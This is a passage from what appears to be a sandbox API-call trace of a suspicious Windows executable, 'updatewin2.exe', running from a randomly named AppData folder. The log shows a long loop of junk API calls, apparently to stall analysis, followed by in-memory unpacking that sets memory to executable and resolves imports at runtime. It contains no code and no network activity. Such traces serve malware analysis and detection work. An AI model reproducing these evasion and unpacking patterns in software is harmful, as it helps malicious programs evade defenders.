(lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.590] AddAtomA (lpString=0x0) returned 0x0 [0130.590] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.590] AddAtomA (lpString=0x0) returned 0x0 [0130.590] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.590] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.635] AddAtomA (lpString=0x0) returned 0x0 [0130.635] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.635] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.635] AddAtomA (lpString=0x0) returned 0x0 [0130.635] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.635] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.635] AddAtomA (lpString=0x0) returned 0x0 [0130.635] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.635] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.635] AddAtomA (lpString=0x0) returned 0x0 [0130.635] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.635] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.635] AddAtomA (lpString=0x0) returned 0x0 [0130.635] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.635] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.636] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.636] AddAtomA (lpString=0x0) returned 0x0 [0130.636] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.637] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.637] AddAtomA (lpString=0x0) returned 0x0 [0130.637] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.638] AddAtomA (lpString=0x0) returned 0x0 [0130.638] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.638] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.639] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.639] AddAtomA (lpString=0x0) returned 0x0 [0130.639] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.640] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.640] AddAtomA (lpString=0x0) returned 0x0 [0130.640] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.640] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.640] AddAtomA (lpString=0x0) returned 0x0 [0130.640] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.640] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.640] AddAtomA (lpString=0x0) returned 0x0 [0130.640] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.640] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.659] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0130.659] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0130.659] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0130.659] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0130.659] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0130.659] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0130.659] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0130.659] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0130.659] SetErrorMode (uMode=0x400) returned 0x0 [0130.659] SetErrorMode (uMode=0x0) returned 0x400 [0130.660] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x5e0000 [0130.662] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0130.721] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.722] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0130.723] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0130.724] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0130.725] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0130.726] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0130.727] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.727] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0130.727] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0130.727] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0130.727] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.727] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0130.728] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0130.728] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0130.732] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0130.732] atexit (param_1=0x2863d8) returned 0 [0130.732] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0x583fbf10, dwHighDateTime=0x1d6bf06)) [0130.732] GetCurrentThreadId () returned 0x67c [0130.732] GetCurrentProcessId () returned 0x564 [0130.732] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=25099671127) returned 1 [0130.732] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0130.732] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.732] GetLastError () returned 0x57 [0130.732] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.732] GetLastError () returned 0x57 [0130.732] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0130.732] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0130.732] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.732] GetLastError () returned 0x57 [0130.732] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0130.732] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0130.733] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.733] GetLastError () returned 0x57 [0130.733] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.733] GetLastError () returned 0x57 [0130.733] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0130.733] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0130.733] GetProcessHeap () returned 0x270000 [0130.733] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.733] GetLastError () returned 0x57 [0130.733] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0130.733] GetLastError () returned 0x57 [0130.733] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0130.733] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x364) returned 0x29ad00 [0130.734] SetLastError (dwErrCode=0x57) [0130.734] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xc00) returned 0x29b070 [0130.735] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0x81be3b50, hStdError=0xfffffffe)) [0130.735] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0130.735] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0130.735] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0130.735] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe\" " [0130.735] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe\" " [0130.735] IsValidCodePage (CodePage=0x4e4) returned 1 [0130.735] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0130.735] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0130.735] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.735] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0130.735] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0130.735] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.735] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, 